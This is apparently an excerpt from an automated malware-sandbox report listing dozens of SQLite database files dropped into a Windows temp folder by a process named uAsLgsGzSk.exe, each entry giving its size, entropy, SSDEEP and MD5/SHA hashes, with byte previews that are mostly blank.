                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\C9ld5y7GPP

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\CeXpYCjrgi

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\ChuLqFZIxZ

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\CqAF65gevD

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\DFvRc7AYl1

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\DVQsiClNlY

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\DpOswUlI9n

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\E4JGDbnr2A

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\EPdSFxzJiD

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\EZwMlbp9WC

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\EhvqHbUZx5

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\FJCCgSzSyK

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\FNulT1ocyk

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Fm2wO2WLXv

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\G57xE3qRME

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\GA7hpSeZ28

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\GLDmEVJW4I

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\GVlFwOrHwm

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\GgQHcjPLMh

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\H2VwEzbOro

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\HQphH1UJLV

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\HRsLbszvin

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\HUB9n3j1nm

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
